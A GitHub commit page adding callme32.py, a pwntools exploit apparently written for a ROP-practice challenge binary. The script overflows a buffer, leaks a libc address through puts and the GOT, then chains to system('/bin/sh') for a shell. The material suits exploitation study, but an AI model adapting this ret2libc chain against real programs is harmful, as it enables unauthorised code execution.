Skip to content

Commit

Permalink
exploit for 32-bit callme binary
Browse files Browse the repository at this point in the history
  • Loading branch information
@AravGarg
AravGarg authored Mar 28, 2020
1 parent dedaf16 commit 17bacfd
Showing 1 changed file with 35 additions and 0 deletions.
35 changes: 35 additions & 0 deletions callme32.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
from pwn import *
target=process('./callme32')
elf=ELF('callme32')
libc=elf.libc

print(target.recvuntil("...\n> "))
fgets_got=0x0804a010
puts_plt=0x080485d0
popret=0x08048579
pwnme=0x080487B6

payload="A"*44
payload+=p32(puts_plt)
payload+=p32(popret)
payload+=p32(fgets_got)
payload+=p32(pwnme)
payload+=p32(0x0)

target.sendline(payload)
leak=target.recv()[0:4]
libc_fgets=u32(leak+"\x00"*(4-len(leak)))
print(hex(libc_fgets))
libc_base=libc_fgets-libc.symbols["fgets"]
print(hex(libc_base))
libc_system=libc_base+libc.symbols["system"]
libc_binsh=libc_base+libc.search("/bin/sh\x00").next()

payload="A"*44
payload+=p32(libc_system)
payload+=p32(0xdeadbeef)
payload+=p32(libc_binsh)
payload+=p32(0x0)

target.sendline(payload)
target.interactive()

0 comments on commit 17bacfd

Please sign in to comment.